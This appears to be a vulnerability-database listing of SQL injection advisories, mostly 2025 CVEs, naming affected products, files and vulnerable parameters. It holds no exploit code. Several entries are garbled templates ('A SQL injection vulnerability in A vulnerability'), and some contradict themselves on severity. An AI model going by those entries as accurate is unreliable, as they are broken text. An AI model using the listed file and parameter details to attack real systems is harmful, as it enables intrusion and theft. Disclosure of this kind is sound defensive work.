SQL Injection

CVE-2025-6342 is a critical SQL injection vulnerability in code-projects Online Shoe Store 1.0, specifically in the /admin/admin_football.php file where the 'pid' parameter is inadequately sanitized. An unauthenticated remote attacker can exploit this to execute arbitrary SQL queries, potentially leading to unauthorized data access, modification, or deletion. The vulnerability has been publicly disclosed with exploit code available, making it actively exploitable in the wild.

Dell PowerScale OneFS, versions 9.5.0.0 through 9.10.0.1, contains an improper neutralization of special elements used in an SQL command ('SQL injection') vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to denial of service, information disclosure, and information tampering.

A SQL injection vulnerability in A vulnerability (CVSS 7.3). Risk factors: public PoC available.

A vulnerability, which was classified as critical, was found in PHPGurukul Directory Management System 2.0. This affects an unknown part of the file /admin/admin-profile.php. The manipulation of the argument adminname leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.

A vulnerability, which was classified as critical, has been found in PHPGurukul Directory Management System 2.0. Affected by this issue is some unknown functionality of the file /admin/manage-directory.php. The manipulation of the argument del leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.

A vulnerability classified as critical was found in PHPGurukul Directory Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/search-directory.php. The manipulation of the argument searchdata leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.

CVE-2025-6330 is a critical SQL injection vulnerability in PHPGurukul Directory Management System version 1.0, specifically in the /searchdata.php file's 'searchdata' parameter. An unauthenticated remote attacker can inject arbitrary SQL commands to compromise confidentiality, integrity, and availability of the underlying database. Public disclosure and proof-of-concept exploitation have occurred, making this an immediately actionable threat despite the moderate CVSS 7.3 score.

CVE-2025-6323 is a critical SQL injection vulnerability in PHPGurukul Pre-School Enrollment System version 1.0, specifically affecting the /enrollment.php file's 'fathername' parameter. An unauthenticated remote attacker can exploit this to execute arbitrary SQL queries, potentially leading to unauthorized data access, modification, or deletion of the enrollment database. The vulnerability has public proof-of-concept code available and may be actively exploited in the wild.

CVE-2025-6322 is a critical SQL injection vulnerability in PHPGurukul Pre-School Enrollment System version 1.0, affecting the /visit.php file's 'gname' parameter. An unauthenticated remote attacker can exploit this vulnerability to inject arbitrary SQL commands, potentially leading to unauthorized data access, modification, or deletion. Public exploit disclosure and confirmed POC availability significantly elevate real-world exploitation risk.

A vulnerability has been found in PHPGurukul Pre-School Enrollment System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin/add-subadmin.php. The manipulation of the argument sadminusername leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.

A vulnerability, which was classified as critical, was found in PHPGurukul Pre-School Enrollment System 1.0. Affected is an unknown function of the file /admin/add-class.php. The manipulation of the argument classname leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.

A vulnerability, which was classified as critical, has been found in PHPGurukul Pre-School Enrollment System 1.0. This issue affects some unknown processing of the file /admin/add-teacher.php. The manipulation of the argument tsubject leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.

CVE-2025-6318 is a critical SQL injection vulnerability in PHPGurukul Pre-School Enrollment System version 1.0, affecting the /admin/check_availability.php file where the 'Username' parameter is improperly sanitized. An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary SQL queries, potentially leading to unauthorized data access, modification, or denial of service. Public disclosure of exploitation details and confirmed POC availability indicate active exploitation risk in the wild.

CVE-2025-6317 is a critical SQL injection vulnerability in code-projects Online Shoe Store version 1.0, affecting the /admin/confirm.php file's ID parameter. An unauthenticated remote attacker can execute arbitrary SQL commands with low complexity, potentially leading to unauthorized data access, modification, or service disruption. Public exploit disclosure and active attack feasibility significantly elevate real-world risk despite the moderate CVSS score of 7.3.

CVE-2025-6316 is a critical SQL injection vulnerability in code-projects Online Shoe Store version 1.0, specifically in the /admin/admin_running.php file where the 'qty' parameter is improperly sanitized. An unauthenticated remote attacker can exploit this flaw to execute arbitrary SQL queries, potentially leading to unauthorized data access, modification, or deletion. The vulnerability has been publicly disclosed with exploit code available, and while the CVSS score is 7.3 (high), the attack vector is network-based with low complexity, indicating active exploitation is feasible.

CVE-2025-6315 is a critical SQL injection vulnerability in code-projects Online Shoe Store version 1.0, affecting the /cart2.php endpoint via an unsanitized ID parameter. An unauthenticated remote attacker can exploit this over the network with low complexity to execute arbitrary SQL queries, potentially leading to unauthorized data access, modification, or denial of service. A public proof-of-concept has been disclosed and the vulnerability may be actively exploited.

CVE-2025-6314 is a critical SQL injection vulnerability in Campcodes Sales and Inventory System 1.0, specifically in the /pages/cat_update.php file's ID parameter, allowing unauthenticated remote attackers to execute arbitrary SQL queries and potentially extract, modify, or delete database contents. The vulnerability has a publicly disclosed exploit (POC available), making it an active threat with immediate exploitation risk; the CVSS 7.3 score reflects moderate-to-high severity with network-based attack capability and no authentication required.

CVE-2025-6313 is a critical SQL injection vulnerability in Campcodes Sales and Inventory System version 1.0, affecting the /pages/cat_add.php endpoint where the 'Category' parameter is improperly sanitized. An unauthenticated remote attacker can exploit this to execute arbitrary SQL queries, potentially compromising data confidentiality, integrity, and availability. The vulnerability has been publicly disclosed with exploit code available and may be actively exploited in the wild.

CVE-2025-6312 is a critical SQL injection vulnerability in Campcodes Sales and Inventory System version 1.0, specifically in the /pages/cash_transaction.php file where the 'cid' parameter is insufficiently sanitized. An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary SQL queries, potentially leading to unauthorized data access, modification, or deletion. The vulnerability has been publicly disclosed with exploitation details available, making it actively exploitable in the wild.

CVE-2025-6311 is a critical SQL injection vulnerability in Campcodes Sales and Inventory System version 1.0 affecting the /pages/account_add.php endpoint. Unauthenticated remote attackers can manipulate the 'id' or 'amount' parameters to execute arbitrary SQL queries, potentially leading to unauthorized data access, modification, or deletion. The vulnerability has public exploit disclosure and demonstrates active exploitation risk with a CVSS score of 7.3 indicating medium-to-high severity.

A SQL injection vulnerability (CVSS 7.3). Risk factors: public PoC available.

A vulnerability classified as critical was found in PHPGurukul Emergency Ambulance Hiring Portal 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/add-ambulance.php. The manipulation of the argument ambregnum leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.

A vulnerability classified as critical has been found in PHPGurukul Emergency Ambulance Hiring Portal 1.0. Affected is an unknown function of the file /admin/bwdates-request-report-details.php. The manipulation of the argument fromdate/todate leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.

CVE-2025-6307 is a critical SQL injection vulnerability in code-projects Online Shoe Store 1.0 affecting the /function/edit_customer.php file, where the 'firstname' parameter is insufficiently sanitized, allowing remote unauthenticated attackers to execute arbitrary SQL queries. The vulnerability has been publicly disclosed with proof-of-concept details available, and while rated 7.3 (High) in CVSS v3.1, the network-accessible attack vector combined with no authentication requirement and demonstrated public exploitation significantly elevates real-world risk. Other parameters in the same function are suspected to be vulnerable to the same injection pattern.

CVE-2025-6306 is a critical SQL injection vulnerability in code-projects Online Shoe Store version 1.0, affecting the admin authentication mechanism in /admin/admin_index.php. An unauthenticated remote attacker can manipulate the Username parameter to execute arbitrary SQL queries, potentially leading to unauthorized access, data theft, or data manipulation. The vulnerability has been publicly disclosed with working exploits available, making active exploitation likely.

CVE-2025-6305 is a critical SQL injection vulnerability in code-projects Online Shoe Store 1.0 affecting the /admin/admin_feature.php endpoint via the product_code parameter. An unauthenticated remote attacker can execute arbitrary SQL commands to read, modify, or delete database contents. The vulnerability has public exploit disclosure and carries a CVSS 7.3 score with confirmed exploitation potential.

CVE-2025-6304 is a critical SQL injection vulnerability in code-projects Online Shoe Store 1.0 affecting the /cart.php file's qty[] parameter, allowing unauthenticated remote attackers to execute arbitrary SQL queries and potentially extract, modify, or delete sensitive data. The vulnerability has been publicly disclosed with proof-of-concept exploits available, presenting immediate exploitation risk to unpatched instances of this e-commerce application.

CVE-2025-6303 is a critical SQL injection vulnerability in code-projects Online Shoe Store version 1.0, specifically in the /contactus1.php file's Message parameter. An unauthenticated remote attacker can exploit this to execute arbitrary SQL queries, potentially leading to unauthorized data access, modification, or deletion. The vulnerability has been publicly disclosed with exploit code available, making active exploitation likely.

A SQL injection vulnerability in A vulnerability classified as critical (CVSS 7.3). Risk factors: public PoC available.

CVE-2025-6296 is a critical SQL injection vulnerability in code-projects Hostel Management System version 1.0, specifically in the /empty_rooms.php file's search_box parameter. An unauthenticated remote attacker can exploit this to execute arbitrary SQL queries, potentially achieving unauthorized data access, modification, or deletion. The vulnerability has been publicly disclosed with exploits available, making active exploitation highly probable in real-world deployments.

A SQL injection vulnerability in A vulnerability (CVSS 7.3). Risk factors: public PoC available.

CVE-2025-6294 is a critical SQL injection vulnerability in code-projects Hostel Management System version 1.0, specifically in the /contact.php file's hostel_name parameter. An unauthenticated remote attacker can exploit this without user interaction to execute arbitrary SQL queries, potentially leading to unauthorized data access, modification, or deletion. The vulnerability has been publicly disclosed with exploit code available, and while CVSS 7.3 indicates moderate-to-high severity with confidentiality, integrity, and availability impact, the simplicity of exploitation (network-accessible, no privileges required, low complexity) makes this a practical threat requiring immediate patching.

CVE-2025-6293 is a critical SQL injection vulnerability in code-projects Hostel Management System v1.0 affecting the /contact_manager.php endpoint, where the student_roll_no parameter is inadequately sanitized, allowing unauthenticated remote attackers to execute arbitrary SQL queries and potentially exfiltrate, modify, or delete database records. Public exploit disclosure and active exploitation signals indicate this is a high-priority threat requiring immediate remediation.

A vulnerability classified as critical has been found in Brilliance Golden Link Secondary System up to 20250609. This affects an unknown part of the file /storagework/custTakeInfoPage.htm. The manipulation of the argument custTradeName leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.

A vulnerability was found in Brilliance Golden Link Secondary System up to 20250609. It has been rated as critical. Affected by this issue is some unknown functionality of the file /storagework/rentTakeInfoPage.htm. The manipulation of the argument custTradeName leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.

A vulnerability was found in zhilink 智互联(深圳)科技有限公司 ADP Application Developer Platform 应用开发者平台 1.0.0. It has been rated as critical. This issue affects some unknown processing of the file /adpweb/a/base/barcodeDetail/. The manipulation of the argument barcodeNo/barcode/itemNo leads to sql injection. The attack may be initiated remotely. The vendor was contacted early about this disclosure but did not respond in any way.

Critical SQL Injection vulnerability in Yirmibes Software MY ERP versions before 1.170 that allows unauthenticated remote attackers to execute arbitrary SQL commands with complete compromise of data confidentiality, integrity, and availability. The vulnerability has a maximum CVSS score of 9.8 (Critical) with zero authentication or user interaction required, making it immediately exploitable over the network. Without access to current KEV/CISA inclusion data or EPSS scores, the high CVSS vector combined with the trivial attack complexity (AC:L) and network accessibility (AV:N) strongly indicates this represents a severe, actively exploitable threat requiring immediate patching.

Critical SQL Injection vulnerability in WeGIA (a web-based management system for charitable institutions) affecting the 'id' parameter of the /WeGIA/controle/control.php endpoint in versions prior to 3.4.2. This unauthenticated, network-accessible vulnerability enables attackers to execute arbitrary SQL queries without privileges or user interaction, resulting in complete compromise of database confidentiality, integrity, and availability. The CVSS 9.8 score reflects the severe impact potential; however, KEV status, EPSS probability, and public POC availability could not be confirmed from provided data and should be verified through CISA and exploit databases.

CloudClassroom-PHP-Project v1.0 contains a critical SQL injection vulnerability in the loginlinkadmin.php component that allows unauthenticated attackers to bypass authentication and gain unauthorized administrative access by injecting malicious SQL payloads into the username field. With a CVSS score of 9.8 and network-accessible attack vector requiring no privileges or user interaction, this vulnerability poses immediate and severe risk to all deployments. While specific KEV status and EPSS data were not provided in the intelligence sources, the combination of complete authentication bypass capability, high CVSS score, and trivial exploitation complexity suggests this is actively exploitable and likely to be targeted by opportunistic attackers.

SQL Injection vulnerability in pbootCMS versions 3.2.5 and 3.2.10 that allows unauthenticated remote attackers to execute arbitrary SQL queries via crafted GET requests, potentially leading to unauthorized data disclosure, modification, or system compromise. With a CVSS score of 8.8 and network-accessible attack vector requiring only user interaction, this represents a critical threat to publicly exposed pbootCMS installations. The vulnerability's high impact on confidentiality, integrity, and availability suggests potential for large-scale exploitation if proof-of-concept code becomes available.

Post-authentication SQL injection vulnerability in Trend Micro Endpoint Encryption PolicyServer that allows low-privileged authenticated users to escalate privileges through SQL injection attacks. The vulnerability has a CVSS score of 7.7 (high severity) with significant impact on confidentiality, integrity, and availability. While this is a post-auth vulnerability requiring initial low-privileged code execution, successful exploitation enables privilege escalation, making it a critical concern for organizations running affected PolicyServer instances.

Post-authentication SQL injection vulnerability in Trend Micro Endpoint Encryption PolicyServer that enables authenticated attackers to escalate privileges and achieve full system compromise (confidentiality, integrity, and availability impact). The vulnerability requires an attacker to first obtain low-privileged code execution on the target system before exploiting the SQL injection to escalate to administrative privileges. With a CVSS score of 8.8 and network accessibility, this represents a significant risk to organizations running vulnerable PolicyServer instances, particularly in environments where initial compromise vectors (phishing, lateral movement, supply chain) are plausible.

SQL injection vulnerability in Trend Micro Endpoint Encryption PolicyServer that enables privilege escalation on affected systems. The vulnerability requires an attacker to first obtain low-privileged code execution on the target system, after which SQL injection can be leveraged to escalate privileges and gain high-impact access (confidentiality compromise, integrity violation, availability disruption). With a CVSS score of 7.7 and local attack vector, this poses a significant risk to organizations running vulnerable PolicyServer instances, particularly in multi-user environments or where low-privileged service accounts are present.

SQL Injection vulnerability in SeaCMS v.12.9 allows a remote attacker to obtain sensitive information via the admin_datarelate.php component.

SQL Injection vulnerability in Anh Tran Slim SEO plugin (versions through 4.5.4) that allows high-privileged attackers to execute arbitrary SQL commands, potentially leading to data exfiltration and service disruption. The vulnerability requires administrator-level privileges to exploit, significantly limiting its real-world impact compared to unauthenticated SQL injection attacks. While the CVSS score of 7.6 indicates moderate-to-high severity, the privilege requirement (PR:H) substantially reduces the practical threat landscape.

Critical SQL injection vulnerability in Adrian Ladó's PostaPanduri application (versions up to 2.1.3) that allows unauthenticated remote attackers to execute arbitrary SQL commands. The vulnerability has a CVSS score of 9.3 with network-based attack vector and no authentication required, enabling attackers to extract sensitive data from the database and potentially cause service disruption. Real-world exploitation risk is elevated due to the complete lack of authentication requirements and straightforward attack vector.

A SQL injection vulnerability in wpjobportal WP Job Portal allows Blind SQL Injection (CVSS 9.3). Critical severity with potential for significant impact on affected systems.

SQL injection vulnerability in WpExperts Hub's Woocommerce Partial Shipment plugin (versions up to 3.2) that allows authenticated attackers with low privileges to execute arbitrary SQL queries. The vulnerability has a CVSS score of 8.5 (High) with network accessibility and low attack complexity, enabling attackers to read sensitive database information and potentially disrupt service availability. The attack requires valid user credentials but no special interaction, making it a significant risk for multi-user WordPress/WooCommerce installations.

Blind SQL injection vulnerability in mojoomla School Management that allows unauthenticated network attackers to extract sensitive data from the application's database without direct visibility of query results. The vulnerability affects School Management versions up to 92.0.0 and carries a CVSS score of 9.3, indicating critical severity. The attack requires no user interaction, no privileges, and low complexity, making it highly exploitable in real-world scenarios.

SQL Injection vulnerability in ValvePress Rankie that allows authenticated attackers to execute arbitrary SQL queries, potentially leading to unauthorized data disclosure and service degradation. The vulnerability affects Rankie across unspecified version ranges and requires valid user credentials to exploit. While the CVSS score of 8.5 indicates high severity, real-world exploitation risk depends on whether public proof-of-concept code exists and the prevalence of Rankie deployments in production environments.

Blind SQL injection vulnerability in smartiolabs Smart Notification versions through 10.3 that allows unauthenticated remote attackers to extract sensitive database information without direct visibility into query results. The vulnerability has a critical CVSS score of 9.3 and affects confidentiality with high severity; while integrity is not compromised, availability can be degraded through resource exhaustion. The network-accessible nature (AV:N) combined with low attack complexity (AC:L) and no authentication requirement (PR:N) makes this a priority vulnerability, though real-world exploitation probability and KEV/active exploitation status require confirmation.

A blind SQL injection vulnerability exists in wpdistillery Navigation Tree Elementor plugin (versions up to 1.0.1) that allows authenticated users to extract sensitive database information through specially crafted input. The vulnerability requires user authentication but operates over the network with low attack complexity, enabling attackers with WordPress user accounts to enumerate and exfiltrate data without direct visibility of query results. No publicly disclosed proof-of-concept or active exploitation in KEV has been confirmed at this time, though the 8.5 CVSS score and SQL injection nature warrant immediate patching.

Blind SQL Injection vulnerability in Suhas Surse WP Employee Attendance System affecting versions through 3.5, allowing authenticated attackers with high privileges to extract sensitive database information. While the CVSS score of 7.6 indicates moderate-to-high severity, the attack requires administrator-level credentials and the confidentiality impact is high; however, integrity and availability impacts are limited. No current KEV designation or widespread public POC availability has been reported, though the vulnerability's nature as SQL injection makes exploitation theoretically straightforward for skilled attackers.

Critical SQL injection vulnerability in the WPCRM plugin (versions up to 3.2.0) for WordPress, affecting deployments integrating Contact Form 7 and WooCommerce. An unauthenticated remote attacker can execute arbitrary SQL commands with high confidence (CVSS 9.3, EPSS score likely elevated) to extract sensitive customer relationship and transaction data, though direct data modification and system availability impacts are limited. Immediate patching is strongly recommended for all affected installations.

A vulnerability classified as critical was found in Webkul QloApps 1.6.1. Affected by this vulnerability is an unknown functionality of the file /admin/ajax_products_list.php. The manipulation of the argument packItself leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The vendor confirms the existence of this flaw but considers it a low-level issue due to admin privilege pre-requisites. Still, a fix is planned for a future release.

A critical SQL injection vulnerability exists in SourceCodester Client Database Management System version 1.0 affecting the /user_customer_create_order.php file, where the user_id parameter is inadequately sanitized. An unauthenticated remote attacker can exploit this vulnerability to inject arbitrary SQL commands, potentially leading to unauthorized data access, modification, or deletion. Public disclosure and proof-of-concept availability elevate exploitation risk, though the CVSS 7.3 rating indicates moderate real-world impact rather than critical severity.

Critical SQL injection vulnerability in code-projects Hostel Management System version 1.0, specifically in the /allocate_room.php file's 'search_box' parameter. An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary SQL queries, potentially leading to unauthorized data access, modification, and system disruption. The vulnerability has been publicly disclosed with proof-of-concept code available, making it actively exploitable in the wild.

Critical SQL injection vulnerability in PHPGurukul Nipah Virus Testing Management System version 1.0, located in the /registered-user-testing.php file where the 'testtype' parameter is improperly sanitized. An unauthenticated remote attacker can exploit this to execute arbitrary SQL queries, potentially compromising data confidentiality, integrity, and availability. The vulnerability has been publicly disclosed with proof-of-concept code available, presenting immediate exploitation risk in production environments.

A vulnerability was found in PHPGurukul Nipah Virus Testing Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /bwdates-report-ds.php. The manipulation of the argument testtype leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.

Critical SQL injection vulnerability in PHPGurukul Hostel Management System 1.0 affecting the login functionality (/includes/login-hm.inc.php). An unauthenticated attacker can manipulate the Username parameter to execute arbitrary SQL queries remotely, potentially compromising data confidentiality, integrity, and availability. Public exploit disclosure and active exploitation potential significantly elevate real-world risk despite a moderate CVSS score of 7.3.

A SQL injection vulnerability in A vulnerability (CVSS 7.3). Risk factors: public PoC available.

A SQL injection vulnerability in A vulnerability (CVSS 7.3). Risk factors: public PoC available.

The Blog2Social: Social Media Auto Post & Scheduler plugin for WordPress is vulnerable to SQL Injection via the ‘prgSortPostType’ parameter in all versions up to, and including, 8.4.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

A vulnerability was found in Projectworlds Life Insurance Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /insertPayment.php. The manipulation of the argument recipt_no leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.

A vulnerability was found in Projectworlds Life Insurance Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /insertNominee.php. The manipulation of the argument client_id/nominee_id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.

A vulnerability was found in Projectworlds Life Insurance Management System 1.0. It has been classified as critical. This affects an unknown part of the file /insertClient.php. The manipulation of the argument client_id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. Other parameters might be affected as well.

A vulnerability was found in Projectworlds Life Insurance Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /insertagent.php. The manipulation of the argument agent_id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.

Critical SQL injection vulnerability in Chanjet CRM 1.0 affecting the /sysconfig/departmentsetting.php endpoint via the gblOrgID parameter. An unauthenticated remote attacker can manipulate this parameter to execute arbitrary SQL queries, potentially leading to unauthorized data access, modification, or deletion. The vulnerability has public exploit disclosure and demonstrates active exploitation potential, making it a high-priority remediation target despite the moderate CVSS score.

Critical SQL injection vulnerability in code-projects Restaurant Order System version 1.0, affecting the /tablelow.php file's ID parameter. An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary SQL commands, potentially leading to unauthorized data access, modification, or deletion of the restaurant database. The vulnerability has been publicly disclosed with proof-of-concept availability, increasing real-world exploitation risk.

A SQL injection vulnerability in A vulnerability (CVSS 7.3). Risk factors: public PoC available.

A vulnerability, which was classified as critical, was found in code-projects Restaurant Order System 1.0. This affects an unknown part of the file /table.php. The manipulation of the argument ID leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.

Das Parking Management System versions up to 6.2.0 contain a critical SQL injection vulnerability in the /vehicle/search API endpoint, specifically in the vehicleTypeCode parameter, allowing unauthenticated remote attackers to execute arbitrary SQL queries and potentially extract, modify, or delete database contents. The vulnerability has been publicly disclosed with proof-of-concept code available, and active exploitation is possible given the CVSS 7.3 score and low attack complexity.

SQL injection vulnerability in Das Parking Management System (停车场管理系统) version 6.2.0 affecting the /Reservations/Search API endpoint. An unauthenticated remote attacker can manipulate the 'Value' parameter to execute arbitrary SQL queries, potentially leading to unauthorized data access, modification, or denial of service. Public exploit code is available and the vulnerability may be actively exploited in the wild.

Critical SQL injection vulnerability in Das Parking Management System (停车场管理系统) version 6.2.0 affecting the /IntraFieldVehicle/Search API endpoint. An unauthenticated remote attacker can manipulate the 'Value' parameter to execute arbitrary SQL queries, potentially leading to unauthorized data access, modification, or deletion. The vulnerability has public exploit disclosure available and carries a CVSS score of 7.3 with demonstrated feasibility of remote exploitation.

A SQL injection vulnerability in Customer Support System (CVSS 8.8) that allows an authenticated attacker. High severity vulnerability requiring prompt remediation.

Critical unauthenticated SQL injection vulnerability in HAMASTAR Technology's WIMP website co-construction management platform that allows remote attackers to execute arbitrary SQL commands without authentication. Attackers can exploit this flaw to read, modify, or delete entire database contents, potentially compromising sensitive project management data, user credentials, and financial information. With a CVSS score of 9.8 and no authentication required, this vulnerability presents an immediate and severe threat to all deployed instances of the WIMP platform.

A vulnerability was found in realguoshuai open-video-cms 1.0. It has been rated as critical. This issue affects some unknown processing of the file /v1/video/list. The manipulation of the argument sort leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

A vulnerability has been found in codesiddhant Jasmin Ransomware up to 1.0.1 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /dashboard.php. The manipulation of the argument Search leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

A SQL injection vulnerability (CVSS 7.3). Risk factors: EPSS 28% exploitation probability, public PoC available.

A vulnerability, which was classified as critical, has been found in qianfox FoxCMS up to 1.2.5. This issue affects the function batchCope of the file app/admin/controller/Download.php. The manipulation of the argument ids leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.

AutomatorWP plugin for WordPress versions up to 5.2.3 contains a time-based SQL injection vulnerability in the field_conditions parameter that allows authenticated administrators and higher-privileged users to extract sensitive database information through insufficient input escaping and lack of prepared statements. While the CVSS score of 7.2 is moderately high, exploitation requires administrator-level access, significantly limiting real-world attack surface; no active exploitation in the wild has been confirmed at this time.

A SQL injection vulnerability (CWE-89) exists in the No Boss Calendar Joomla component versions prior to 5.0.7, allowing authenticated users with high privileges to execute arbitrary SQL commands through the id_module parameter. The vulnerability has a CVSS 4.0 score of 8.6 with high impact on confidentiality, integrity, and availability of the database. While the attack requires high-privilege authenticated access, successful exploitation could lead to complete database compromise, data exfiltration, or system takeover.

Description: VMware AVI Load Balancer contains an authenticated blind SQL Injection vulnerability. VMware has evaluated the severity of the issue to be in the Moderate severity range https://www.broadcom.com/support/vmware-services/security-response  with a maximum CVSSv3 base score of 6.8 https://www.first.org/cvss/calculator/3-0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N . Known Attack Vectors: An authenticated malicious user with network access may be able to use specially crafted SQL queries to gain database access. Resolution: To remediate CVE-2025-41233 apply the patches to the Avi Controller listed in the 'Fixed Version' column of the 'Response Matrix' found below. Workarounds: None. Additional Documentation: None. Acknowledgements: VMware would like to thank Alexandru Copaceanu https://www.linkedin.com/in/alexandru-copaceanu-b39aaa1a8/  for reporting this issue to us. Notes: None.   Response Matrix: ProductVersionRunning OnCVECVSSv4SeverityFixed VersionWorkaroundsAdditional DocumentsVMware Avi Load Balancer30.1.1AnyCVE-2025-41233 6.8 https://www.first.org/cvss/calculator/3-0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N Moderate 30.1.2-2p3 https://techdocs.broadcom.com/us/en/vmware-security-load-balancing/avi-load-balancer/avi-load-balancer/30-1/vmware-avi-load-balancer-release-notes/release-notes-30-1-2.html NoneNoneVMware Avi Load Balancer30.1.2AnyCVE-2025-41233 6.8 https://www.first.org/cvss/calculator/3-0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N Moderate 30.1.2-2p3 https://techdocs.broadcom.com/us/en/vmware-security-load-balancing/avi-load-balancer/avi-load-balancer/30-1/vmware-avi-load-balancer-release-notes/release-notes-30-1-2.html NoneNoneVMware Avi Load Balancer30.2.1AnyCVE-2025-41233 6.8 https://www.first.org/cvss/calculator/3-0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N Moderate 30.2.1-2p6 https://techdocs.broadcom.com/us/en/vmware-security-load-balancing/avi-load-balancer/avi-load-balancer/30-2/vmware-avi-load-balancer-release-notes/release-notes-for-avi-load-balancer-version-30-2-1.html NoneNoneVMware Avi Load Balancer30.2.2AnyCVE-2025-41233 6.8 https://www.first.org/cvss/calculator/3-0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N Moderate 30.2.2-2p5 https://techdocs.broadcom.com/us/en/vmware-security-load-balancing/avi-load-balancer/avi-load-balancer/30-2/vmware-avi-load-balancer-release-notes/release-notes-for-avi-load-balancer-version-30-2-2.html NoneNoneVMware Avi Load Balancer30.2.3AnyCVE-2025-41233N/AN/AUnaffectedNoneNoneVMware Avi Load Balancer31.1.1AnyCVE-2025-41233 6.8 https://www.first.org/cvss/calculator/3-0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N Moderate 31.1.1-2p2 https://techdocs.broadcom.com/us/en/vmware-security-load-balancing/avi-load-balancer/avi-load-balancer/31-1/vmware-avi-load-balancer-release-notes/Release-Note-Section-20627.html NoneNone CWE-89 in the Avi Load Balancer component of VMware allows an authenticated attacker to execute blind SQL injections in versions 30.1.1, 30.1.2, 30.2.1, and 30.2.2 due to improper input validation, enabling unauthorized database access.

Multiple SQL injection vulnerabilities in the EuroInformation MoneticoPaiement module before 1.1.1 for PrestaShop allow remote attackers to execute arbitrary SQL commands via the TPE, societe, MAC, reference, or aliascb parameter to transaction.php, validation.php, or callback.php.

Critical unauthenticated SQL injection vulnerability in the JEvents component for Joomla that allows remote attackers to execute arbitrary SQL queries through publicly accessible date range filtering actions. The vulnerability affects JEvents versions before 3.6.88 and 3.6.82.1, enabling attackers to extract sensitive database information, modify data, or potentially achieve remote code execution. With a CVSS score of 9.3 and network-based attack vector requiring no privileges or user interaction, this represents a severe risk to all unpatched Joomla installations using vulnerable JEvents versions.

pg-promise before 11.5.5 is vulnerable to SQL Injection due to improper handling of negative numbers.

uptrace pgdriver v1.2.1 was discovered to contain a SQL injection vulnerability via the appendArg function in /pgdriver/format.go. The maintainer has stated that the issue is fixed in v1.2.15.

go-pg pg v10.13.0 was discovered to contain a SQL injection vulnerability via the component /types/append_value.go.

A vulnerability was found in kiCode111 like-girl 5.2.0 and classified as critical. Affected by this issue is some unknown functionality of the file /admin/ipAddPost.php. The manipulation of the argument bz/ipdz leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

A vulnerability has been found in kiCode111 like-girl 5.2.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin/ImgAddPost.php. The manipulation of the argument imgDatd/imgText/imgUrl leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.